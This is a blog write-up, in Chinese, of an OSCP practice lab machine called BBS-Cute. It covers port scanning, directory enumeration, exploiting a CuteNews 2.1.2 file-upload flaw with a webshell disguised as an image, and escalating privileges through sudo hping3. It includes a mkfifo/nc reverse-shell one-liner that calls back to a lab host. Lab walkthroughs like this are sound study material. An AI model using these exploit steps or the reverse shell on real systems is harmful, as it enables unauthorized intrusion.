【OSCP系列】OSCP靶机—BBS-Cute
OSCP系列靶机—BBS-Cute
一、主机发现

二、端口扫描
1、快速扫描

2、全端口扫描

3、服务版本探测
1 | nmap -sT -sV -sC -O -p 22,80,88,110,995 192.168.56.104 |

88端口开了一个http服务,但标题确实404未找到,110和995是POP3服务,可能存在一些信息
4、漏洞探测
1 | nmap --script=vuln -p 22,80,88,110,995 192.168.56.104 |

80端口发现了一些目录;诶诶,这个88端口的服务怎么变了,而且开放的还是kerberos服务
三、HTTP信息收集
1、首页及源代码

Apache2的首页,应该拿不到什么信息
2、目录扫描
1 | dirsearch -u http://192.168.56.104/ -x 404,403 |

有很多目录和文件
3、index.php文件

一个登陆点,同时在这里给到了一个版本号:2.1.2;第一时间当然是搜索有无漏洞了

我们对第四个非常感兴趣,尝试执行,没有东西

4、文件上传尝试

这里给了文件上传的POC,但是利用提交是需要一个上传点,那这里需要登陆后台去先;注册用户登陆后台

注册成功,来到后台;在注册中的验证码需要bp抓包查看;之后找文件上传的点

进来之后,可以看到正好有上传的点

按照POC的步骤尝试上传;先写一个webshell,上传抓包后改包

改为php后缀

给了个报错,说头像不合格

应该是有检测机制,我们写入一个真正的图片中去

更改后缀,啊,又有新的情况;是一个csrf 的防御机制,这个我们重新抓包来一遍即可

成功上传

那上传到什么位置了呢?之前看到有个uploads的目录,尝试执行命令

执行失败了,可能是木马有问题,重新尝试;不对,看到文件的上传点居然在另一个域名

四、Getshell
重新返回去看之前命令执行的py 文件,在翻看了源代码之后发现确实存在差错

这里多了CuteNews的路径,需要删除全文的这个路径;大概有五处需要修改,修改之后再次执行

成功获取shell,之后我们反弹过来nc
1 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.101 4444 >/tmp/f |

五、权限提升
1、信息收集
发现可以sudo 的使用hping3,直接提权

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Lusenの小窝!
评论